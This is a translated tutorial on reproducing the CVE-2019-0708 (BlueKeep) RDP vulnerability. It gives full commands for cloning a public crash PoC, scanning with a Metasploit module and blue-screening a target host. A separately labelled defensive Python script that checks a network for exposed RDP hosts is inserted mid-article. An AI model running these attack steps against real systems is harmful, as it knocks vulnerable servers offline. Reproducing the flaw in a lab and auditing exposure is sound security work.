2025-01-16 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
This article walks through an example of reproducing exploitation of the CVE-2019-0708 vulnerability. The editor thinks it is very practical, so it is shared here for reference. I hope you get something out of it.
0x00 Vulnerability overview
On May 15, 2019, a high-risk vulnerability affecting Windows servers was disclosed. It is exploited through the Remote Desktop port, 3389, and is comparable to WannaCry (a worm).
0x01 Affected versions
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows Server 2003
Windows XP
0x02 Vulnerability reproduction
For the exploit to succeed, the target must have port 3389 open and its firewall turned off.
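The same two conditions, together with the affected-version list above, can be turned into an exposure audit of your own network. The following is an added example, not code from the article or from the PoC repository; the sample scan lines, the inventory and all function names are constructed for illustration, and the scan input is assumed to be nmap grepable (-oG) output.

```python
import csv
import io
import re

# Affected versions as listed in this article (R2 first so the specific name wins).
AFFECTED = ("Windows 7", "Windows Server 2008 R2", "Windows Server 2008",
            "Windows Server 2003", "Windows XP")

# Constructed sample data (not from the article): nmap -oG lines and an inventory.
SAMPLE_SCAN = """\
Host: 10.0.0.11 ()\tPorts: 3389/open/tcp//ms-wbt-server///
Host: 10.0.0.12 ()\tPorts: 3389/filtered/tcp//ms-wbt-server///
Host: 10.0.0.13 ()\tPorts: 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///
Host: 10.0.0.14 ()\tPorts: 3389/open/tcp//ms-wbt-server///
"""
SAMPLE_INVENTORY = """\
ip,os
10.0.0.11,Windows Server 2008 R2 Standard SP1
10.0.0.12,Windows 7 Professional
10.0.0.13,Windows 10 Enterprise
10.0.0.14,Microsoft Windows XP Professional
"""

def hosts_with_rdp_open(grepable):
    """Return the set of IPs whose 3389/tcp is reported as 'open'."""
    found = set()
    for line in grepable.splitlines():
        m = re.match(r"Host: (\S+) .*?Ports: (.*)", line)
        ports = m.group(2).split(",") if m else []
        if any(p.strip().split("/")[:3] == ["3389", "open", "tcp"] for p in ports):
            found.add(m.group(1))
    return found

def affected_version(os_name):
    """Return the matching entry from AFFECTED, or None."""
    for name in AFFECTED:
        # \b keeps "Windows 7" from matching a longer number such as "Windows 70".
        if re.search(re.escape(name) + r"\b", os_name, re.IGNORECASE):
            return name
    return None

def exposed_hosts(grepable, inventory_csv):
    """(ip, version) pairs meeting both of the article's preconditions."""
    rdp = hosts_with_rdp_open(grepable)
    rows = csv.DictReader(io.StringIO(inventory_csv))
    return sorted((r["ip"], affected_version(r["os"])) for r in rows
                  if r["ip"] in rdp and affected_version(r["os"]))

if __name__ == "__main__":
    print(exposed_hosts(SAMPLE_SCAN, SAMPLE_INVENTORY))
```

In the sample data, 10.0.0.12 runs an affected version but its port is filtered, and 10.0.0.13 has the port open but runs an unlisted version, so neither is reported.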
1. Download the PoC:
CVE-2019-0708-POC GitHub:
git clone https://github.com/n1xbyte/cve-2019-0708
cd cve-2019-0708
2. Install the required libraries (this library is already installed on my Kali system, so I won't take a screenshot here)
pip3 install impacket
3. Run the PoC to start the attack
python3 crashpoc.py 192.168.88.150 64 # IP address, system version
The target system then blue-screened, which shows that the attack succeeded.
----------
Using MSF to reproduce the vulnerability
First download the PoC to the root directory
git clone https://github.com/n1xbyte/cve-2019-0708
cd cve-2019-0708
Start msf
service postgresql start
msfdb init
msfconsole
Search for modules related to CVE-2019-0708
search 0708
Let's use auxiliary module 0 first.
use 0
Then set RHOSTS.
set rhosts 192.168.88.150
Then start the test with run.
run
The result shows that the target is vulnerable.
Next we attack it with the PoC we downloaded.
python3 crashpoc.py 192.168.88.150 64
The attack succeeded and the system blue-screened again.
This is the end of the article on the example analysis of reproducing the CVE-2019-0708 vulnerability. I hope the above content is helpful and that you learned something from it. If you think the article is good, please share it so more people can see it.